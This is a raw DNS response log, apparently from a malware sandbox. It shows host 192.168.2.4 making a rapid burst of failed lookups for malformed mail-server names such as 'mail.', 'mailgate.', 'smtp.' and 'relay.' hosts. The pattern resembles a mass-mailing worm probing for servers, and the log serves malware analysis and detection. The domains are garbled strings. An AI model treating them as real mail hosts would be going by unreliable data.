Nov 30, 2023 11:22:45.195116043 CET	1.1.1.1	192.168.2.4	0xa790	Name error (3)	mail.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.197221994 CET	1.1.1.1	192.168.2.4	0x3d49	Name error (3)	mail.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.197685003 CET	1.1.1.1	192.168.2.4	0x4979	Name error (3)	mail.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.201487064 CET	1.1.1.1	192.168.2.4	0x3b29	Name error (3)	imap.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.223917007 CET	1.1.1.1	192.168.2.4	0x6993	Name error (3)	mail.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.232868910 CET	1.1.1.1	192.168.2.4	0xb24e	Name error (3)	mailgate.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.245299101 CET	1.1.1.1	192.168.2.4	0x3e6a	Name error (3)	mail.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.246319056 CET	1.1.1.1	192.168.2.4	0xe004	Name error (3)	relay.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.246961117 CET	1.1.1.1	192.168.2.4	0xb579	Name error (3)	mail.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.247255087 CET	1.1.1.1	192.168.2.4	0xc501	Name error (3)	mail.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.248239040 CET	1.1.1.1	192.168.2.4	0xc96e	Name error (3)	mail.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.249836922 CET	1.1.1.1	192.168.2.4	0x9d65	Name error (3)	mail.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.250408888 CET	1.1.1.1	192.168.2.4	0xc2ab	Name error (3)	mail.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.251068115 CET	1.1.1.1	192.168.2.4	0x101f	Name error (3)	mail.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.252960920 CET	1.1.1.1	192.168.2.4	0x148f	Name error (3)	mail.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.297796011 CET	1.1.1.1	192.168.2.4	0x62b4	Name error (3)	mail.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.298170090 CET	1.1.1.1	192.168.2.4	0xe004	Name error (3)	relay.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.299197912 CET	1.1.1.1	192.168.2.4	0xb24e	Name error (3)	mailgate.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.300611019 CET	1.1.1.1	192.168.2.4	0xd056	Name error (3)	mail.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.301814079 CET	1.1.1.1	192.168.2.4	0x5c01	Name error (3)	pop3.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.301894903 CET	1.1.1.1	192.168.2.4	0x5c01	Name error (3)	pop3.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.304331064 CET	1.1.1.1	192.168.2.4	0xb33d	Name error (3)	mailgate.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.304655075 CET	1.1.1.1	192.168.2.4	0x948b	Name error (3)	mail.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.304735899 CET	1.1.1.1	192.168.2.4	0x73e5	Name error (3)	mail.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.305149078 CET	1.1.1.1	192.168.2.4	0x46c8	Name error (3)	mailgate.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.306426048 CET	1.1.1.1	192.168.2.4	0x8fe5	Name error (3)	mail.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.316946983 CET	1.1.1.1	192.168.2.4	0xd439	Name error (3)	smtp.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.337929010 CET	1.1.1.1	192.168.2.4	0x5dcf	Name error (3)	mail.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.351023912 CET	1.1.1.1	192.168.2.4	0x2de9	Name error (3)	mail.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.351047039 CET	1.1.1.1	192.168.2.4	0x3974	Name error (3)	mail.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.352950096 CET	1.1.1.1	192.168.2.4	0x78e3	Name error (3)	mail.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.354286909 CET	1.1.1.1	192.168.2.4	0x397	Name error (3)	mail.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.355226994 CET	1.1.1.1	192.168.2.4	0x437c	Name error (3)	mail.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.355245113 CET	1.1.1.1	192.168.2.4	0xb1d8	Name error (3)	mail.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.355812073 CET	1.1.1.1	192.168.2.4	0x4b16	Name error (3)	mail.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.356636047 CET	1.1.1.1	192.168.2.4	0xdd10	Name error (3)	mail.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.357239962 CET	1.1.1.1	192.168.2.4	0x39e3	Name error (3)	mail.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.359184027 CET	1.1.1.1	192.168.2.4	0x6668	Name error (3)	mail.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.360662937 CET	1.1.1.1	192.168.2.4	0xd338	Name error (3)	mail.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.361130953 CET	1.1.1.1	192.168.2.4	0x25e2	Name error (3)	mail.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.361228943 CET	1.1.1.1	192.168.2.4	0xe067	Name error (3)	mail.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.361813068 CET	1.1.1.1	192.168.2.4	0x7bc8	Name error (3)	relay.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.362782955 CET	1.1.1.1	192.168.2.4	0x6d38	Name error (3)	mail.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.362799883 CET	1.1.1.1	192.168.2.4	0x5210	Name error (3)	mail.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.364331007 CET	1.1.1.1	192.168.2.4	0x6c39	Name error (3)	mail.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.365530968 CET	1.1.1.1	192.168.2.4	0x6de8	Name error (3)	mailgate.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.365869999 CET	1.1.1.1	192.168.2.4	0xfc71	Name error (3)	mail.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.370028019 CET	1.1.1.1	192.168.2.4	0xa812	Name error (3)	mailgate.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.372703075 CET	1.1.1.1	192.168.2.4	0x4050	Name error (3)	mail.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.374531984 CET	1.1.1.1	192.168.2.4	0x4a3d	Name error (3)	mail.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.374572039 CET	1.1.1.1	192.168.2.4	0xc9e1	Name error (3)	mailgate.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.374587059 CET	1.1.1.1	192.168.2.4	0x593f	Name error (3)	mailgate.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.374603987 CET	1.1.1.1	192.168.2.4	0x385b	Name error (3)	mailgate.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.375494957 CET	1.1.1.1	192.168.2.4	0x90c3	Name error (3)	mail.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.377311945 CET	1.1.1.1	192.168.2.4	0xa81f	Name error (3)	mailgate.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.414088964 CET	1.1.1.1	192.168.2.4	0xffdd	Name error (3)	mail.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.476499081 CET	1.1.1.1	192.168.2.4	0xf2a5	Server failure (2)	pop3.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.502667904 CET	1.1.1.1	192.168.2.4	0x3e7	Name error (3)	mailgate.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.541292906 CET	1.1.1.1	192.168.2.4	0xf2a5	Server failure (2)	pop3.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.552103996 CET	1.1.1.1	192.168.2.4	0xc6d2	Name error (3)	mail.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.557709932 CET	1.1.1.1	192.168.2.4	0xace7	Name error (3)	mail.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.558540106 CET	1.1.1.1	192.168.2.4	0x1dcc	Name error (3)	mail.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.560082912 CET	1.1.1.1	192.168.2.4	0xdb85	Name error (3)	mail.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.561604977 CET	1.1.1.1	192.168.2.4	0xd7e2	Name error (3)	mail.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.570081949 CET	1.1.1.1	192.168.2.4	0xdfc2	Name error (3)	mail.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.571491003 CET	1.1.1.1	192.168.2.4	0x6b5f	Name error (3)	mailgate.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.592807055 CET	1.1.1.1	192.168.2.4	0x9c8e	Name error (3)	mailgate.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.611054897 CET	1.1.1.1	192.168.2.4	0xa9ce	Name error (3)	mailgate.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.650913000 CET	1.1.1.1	192.168.2.4	0x98fa	Name error (3)	mail.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.668936014 CET	1.1.1.1	192.168.2.4	0x42b1	Server failure (2)	mail.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.670078993 CET	1.1.1.1	192.168.2.4	0xab44	Name error (3)	mail.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.671401024 CET	1.1.1.1	192.168.2.4	0x6ccb	Name error (3)	mailgate.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.684190035 CET	1.1.1.1	192.168.2.4	0x6581	Server failure (2)	mail.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.684245110 CET	1.1.1.1	192.168.2.4	0x6581	Server failure (2)	mail.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.688465118 CET	1.1.1.1	192.168.2.4	0x159	Name error (3)	relay.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.700510025 CET	1.1.1.1	192.168.2.4	0x5cf4	Name error (3)	pop3.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.700951099 CET	1.1.1.1	192.168.2.4	0xfa5a	Name error (3)	mailgate.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.725250006 CET	1.1.1.1	192.168.2.4	0x2a64	Name error (3)	mailgate.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.758095026 CET	1.1.1.1	192.168.2.4	0xc618	Name error (3)	pop3.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.761250973 CET	1.1.1.1	192.168.2.4	0xd491	Name error (3)	mailgate.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.810600996 CET	1.1.1.1	192.168.2.4	0x8600	Name error (3)	mailgate.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.854304075 CET	1.1.1.1	192.168.2.4	0xc618	Name error (3)	pop3.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.854816914 CET	1.1.1.1	192.168.2.4	0xa9ce	Name error (3)	mailgate.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.868391991 CET	1.1.1.1	192.168.2.4	0x3d04	Name error (3)	mailgate.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.869457960 CET	1.1.1.1	192.168.2.4	0x66c4	Name error (3)	mailgate.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.871682882 CET	1.1.1.1	192.168.2.4	0xa266	Name error (3)	mailgate.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.872728109 CET	1.1.1.1	192.168.2.4	0x8514	Name error (3)	mailgate.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.908166885 CET	1.1.1.1	192.168.2.4	0x4bd3	Name error (3)	mailgate.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.909786940 CET	1.1.1.1	192.168.2.4	0xe847	Name error (3)	mailgate.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.918287039 CET	1.1.1.1	192.168.2.4	0x4b71	Name error (3)	mailgate.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.919473886 CET	1.1.1.1	192.168.2.4	0xb44a	Name error (3)	mailgate.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.919774055 CET	1.1.1.1	192.168.2.4	0xc150	Name error (3)	mailgate.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.920041084 CET	1.1.1.1	192.168.2.4	0x1b12	Name error (3)	relay.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.921458006 CET	1.1.1.1	192.168.2.4	0xff42	Name error (3)	mailgate.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.922221899 CET	1.1.1.1	192.168.2.4	0x512	Name error (3)	mailgate.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.923662901 CET	1.1.1.1	192.168.2.4	0xd145	Name error (3)	mailgate.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.924321890 CET	1.1.1.1	192.168.2.4	0xfda2	Name error (3)	mailgate.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.927144051 CET	1.1.1.1	192.168.2.4	0x6610	Name error (3)	mailgate.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.928800106 CET	1.1.1.1	192.168.2.4	0xd57	Name error (3)	mailgate.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.931827068 CET	1.1.1.1	192.168.2.4	0x9b43	Name error (3)	mailgate.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.932418108 CET	1.1.1.1	192.168.2.4	0x169b	Name error (3)	mailgate.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.934062958 CET	1.1.1.1	192.168.2.4	0x77ee	Name error (3)	mailgate.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.934290886 CET	1.1.1.1	192.168.2.4	0x3f7a	Name error (3)	mailgate.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.937066078 CET	1.1.1.1	192.168.2.4	0xfdef	Name error (3)	relay.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.942277908 CET	1.1.1.1	192.168.2.4	0xcd62	Name error (3)	relay.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.943805933 CET	1.1.1.1	192.168.2.4	0xe8e0	Name error (3)	mailgate.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.944524050 CET	1.1.1.1	192.168.2.4	0x546d	Name error (3)	relay.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.951554060 CET	1.1.1.1	192.168.2.4	0x5707	Name error (3)	mailgate.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.952002048 CET	1.1.1.1	192.168.2.4	0x9b37	Name error (3)	mailgate.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.953746080 CET	1.1.1.1	192.168.2.4	0x5e69	Name error (3)	mailgate.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.954734087 CET	1.1.1.1	192.168.2.4	0x5399	Name error (3)	mailgate.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.955856085 CET	1.1.1.1	192.168.2.4	0xffe9	Name error (3)	mailgate.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.958112955 CET	1.1.1.1	192.168.2.4	0xd052	Name error (3)	mailgate.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.969116926 CET	1.1.1.1	192.168.2.4	0xb239	Server failure (2)	mailgate.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.985743046 CET	1.1.1.1	192.168.2.4	0x4079	Name error (3)	smtp.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:45.985759020 CET	1.1.1.1	192.168.2.4	0x1217	Name error (3)	mailgate.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.038186073 CET	1.1.1.1	192.168.2.4	0xaf0a	Name error (3)	relay.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.046134949 CET	1.1.1.1	192.168.2.4	0x5665	Name error (3)	mailgate.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.046391010 CET	1.1.1.1	192.168.2.4	0xe281	Name error (3)	mailgate.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.048090935 CET	1.1.1.1	192.168.2.4	0x88c2	Name error (3)	relay.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.048434019 CET	1.1.1.1	192.168.2.4	0xb39d	Name error (3)	mailgate.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.050436974 CET	1.1.1.1	192.168.2.4	0x27eb	Name error (3)	smtp.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.099420071 CET	1.1.1.1	192.168.2.4	0x1684	Name error (3)	mailgate.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.103164911 CET	1.1.1.1	192.168.2.4	0xeca4	Name error (3)	smtp.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.106569052 CET	1.1.1.1	192.168.2.4	0x9a14	Name error (3)	mailgate.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.111874104 CET	1.1.1.1	192.168.2.4	0xe332	Name error (3)	smtp.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.122914076 CET	1.1.1.1	192.168.2.4	0xc49c	Name error (3)	mailgate.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.125596046 CET	1.1.1.1	192.168.2.4	0xf15d	Name error (3)	mailgate.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.145365000 CET	1.1.1.1	192.168.2.4	0xa83	Name error (3)	mailgate.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.164632082 CET	1.1.1.1	192.168.2.4	0xa6b2	Name error (3)	relay.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.165858984 CET	1.1.1.1	192.168.2.4	0xb44a	Name error (3)	mailgate.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.165905952 CET	1.1.1.1	192.168.2.4	0xaf0a	Name error (3)	relay.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.166325092 CET	1.1.1.1	192.168.2.4	0x4b71	Name error (3)	mailgate.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.167021990 CET	1.1.1.1	192.168.2.4	0xe332	Name error (3)	smtp.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.167627096 CET	1.1.1.1	192.168.2.4	0x1799	Name error (3)	mailgate.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.175599098 CET	1.1.1.1	192.168.2.4	0xdd34	Name error (3)	mail.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.181969881 CET	1.1.1.1	192.168.2.4	0xbbb0	Name error (3)	relay.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.222683907 CET	1.1.1.1	192.168.2.4	0x9660	Name error (3)	mailgate.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.228362083 CET	1.1.1.1	192.168.2.4	0x5c1f	Name error (3)	mailgate.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.248023987 CET	1.1.1.1	192.168.2.4	0xa83	Name error (3)	mailgate.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.251319885 CET	1.1.1.1	192.168.2.4	0x2eb8	Name error (3)	smtp.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.270953894 CET	1.1.1.1	192.168.2.4	0x2e2c	Name error (3)	mailgate.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.274827003 CET	1.1.1.1	192.168.2.4	0xdbe0	Name error (3)	smtp.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.276611090 CET	1.1.1.1	192.168.2.4	0xc775	Name error (3)	mail.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.279758930 CET	1.1.1.1	192.168.2.4	0x758c	Name error (3)	relay.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.281676054 CET	1.1.1.1	192.168.2.4	0xe1ff	Name error (3)	mail.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.286659956 CET	1.1.1.1	192.168.2.4	0xeff3	Name error (3)	mail.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.287460089 CET	1.1.1.1	192.168.2.4	0x715b	Name error (3)	mailgate.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.288228035 CET	1.1.1.1	192.168.2.4	0xb85	Name error (3)	mail.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.293109894 CET	1.1.1.1	192.168.2.4	0xba7d	Name error (3)	smtp.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.294296026 CET	1.1.1.1	192.168.2.4	0x6408	Name error (3)	mailgate.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.295224905 CET	1.1.1.1	192.168.2.4	0xd0e9	Name error (3)	relay.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.298075914 CET	1.1.1.1	192.168.2.4	0x4072	Name error (3)	relay.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.329596996 CET	1.1.1.1	192.168.2.4	0x44f2	Name error (3)	mailgate.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.366880894 CET	1.1.1.1	192.168.2.4	0x5176	Name error (3)	smtp.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.367194891 CET	1.1.1.1	192.168.2.4	0xda2f	Name error (3)	mail.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.369188070 CET	1.1.1.1	192.168.2.4	0xb7b4	Name error (3)	relay.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.419886112 CET	1.1.1.1	192.168.2.4	0xbca2	Name error (3)	pop3.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.419939041 CET	1.1.1.1	192.168.2.4	0xbca2	Name error (3)	pop3.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.450154066 CET	1.1.1.1	192.168.2.4	0x69ae	Name error (3)	relay.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.452117920 CET	1.1.1.1	192.168.2.4	0xd713	Name error (3)	mailgate.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.452811956 CET	1.1.1.1	192.168.2.4	0x710f	Name error (3)	mail.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.470576048 CET	1.1.1.1	192.168.2.4	0xc69d	Name error (3)	mail.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.484812021 CET	1.1.1.1	192.168.2.4	0x3d58	Name error (3)	mailgate.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.487169027 CET	1.1.1.1	192.168.2.4	0x1d35	Name error (3)	relay.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.488823891 CET	1.1.1.1	192.168.2.4	0x6ef	Name error (3)	relay.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.496433020 CET	1.1.1.1	192.168.2.4	0x6373	Name error (3)	relay.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.496927977 CET	1.1.1.1	192.168.2.4	0x93ae	Name error (3)	relay.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.518174887 CET	1.1.1.1	192.168.2.4	0x77b8	Server failure (2)	mailgate.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.526448011 CET	1.1.1.1	192.168.2.4	0x6958	Name error (3)	mailgate.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.536576033 CET	1.1.1.1	192.168.2.4	0x57f7	Name error (3)	mailgate.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
